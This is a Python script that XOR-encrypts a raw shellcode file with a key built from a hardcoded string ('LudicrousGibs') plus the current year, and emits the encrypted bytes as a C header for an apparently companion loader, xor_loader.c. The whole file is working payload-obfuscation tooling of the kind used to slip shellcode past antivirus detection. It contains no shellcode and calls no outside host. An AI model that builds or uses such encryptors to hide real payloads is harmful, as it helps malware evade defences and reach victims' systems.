#! /usr/bin/env python3

import sys
import datetime
import argparse

# Function to build the dynamic key string (String + Year)
def build_key(hardcoded_part, manual_year=None):
    """Builds the dynamic key string (String + Year)."""

    if manual_year:
        current_year = str(manual_year)
    else:
        current_year = str(datetime.datetime.now().year)

    full_key = hardcoded_part + current_year
    return full_key, current_year

# Function to perform XOR encryption
def xor_encrypt(data, key):
    """XORs data with the key, repeating the key as needed."""
    key_len = len(key)
    encrypted_data = bytearray(len(data))

    for i in range(len(data)):
        # XOR current byte of data with the corresponding key byte (key wraps around)
        # ord() converts the character to its ASCII/integer value
        encrypted_data[i] = data[i] ^ ord(key[i % key_len])

    return encrypted_data

def main():
    parser = argparse.ArgumentParser(
        description="Custom XOR encryption script for shellcode generation.",
        formatter_class=argparse.RawTextHelpFormatter
    )

    parser.add_argument(
        '-i', '--input',
        type=str,
        required=True,
        help="Input raw shellcode file (e.g., shellcode.bin)."
    )
    parser.add_argument(
        '-o', '--output',
        type=str,
        default="hamdinger_data.h",
        help="Output C header file name (default: hamdinger_data.h)."
    )
    parser.add_argument(
        '-k', '--key-part',
        type=str,
        default="LudicrousGibs",
        help="The hardcoded string part of the decryption key (default: LudicrousGibs)."
    )
    parser.add_argument(
        '-y', '--year',
        type=int,
        help="Optional: Manually specify the calendar year for the key. If omitted, the current system year will be used. Within xor_loader.c the year is appended to every key at runtime to provide a dynamic element."
    )

    args = parser.parse_args()

    # 1. Build the dynamic key
    FULL_KEY, YEAR_STR = build_key(args.key_part, args.year)

    # 2. Read the raw data
    try:
        with open(args.input, 'rb') as f:
            raw_data = bytearray(f.read())
    except FileNotFoundError:
        print(f"Error: Input file not found: {args.input}")
        sys.exit(1)

    # 3. Encrypt the data
    encrypted_data = xor_encrypt(raw_data, FULL_KEY)
    length = len(encrypted_data)

    # 4. Generate the C header file
    array_name = "encrypted_hamdinger"

    with open(args.output, 'w') as f:
        f.write(f'// Generated by custom XOR encryptor. Key base: "{args.key_part}", Year: {YEAR_STR}\n')
        f.write(f'unsigned char {array_name}[] = {{\n')

        # Format data into C array syntax
        for i in range(0, length):
            if i % 15 == 0:
                f.write('\n  ')
            f.write(f'0x{encrypted_data[i]:02x}, ')

        f.write('\n};\n')
        f.write(f'unsigned int hamdinger_len = {length};\n')

    print("\n--- Encryption Summary ---")
    print(f"Input File: {args.input}")
    print(f"Output File: {args.output}")
    print(f"Hardcoded Key Part: '{args.key_part}'")
    print(f"Dynamic Year Part: '{YEAR_STR}'")
    print(f"Full Encryption Key: '{FULL_KEY}' (Length: {len(FULL_KEY)})")
    print(f"Payload Length: {length} bytes")
    print("--------------------------")
    print(f"Successfully generated {args.output}.")

if __name__ == "__main__":
    main()
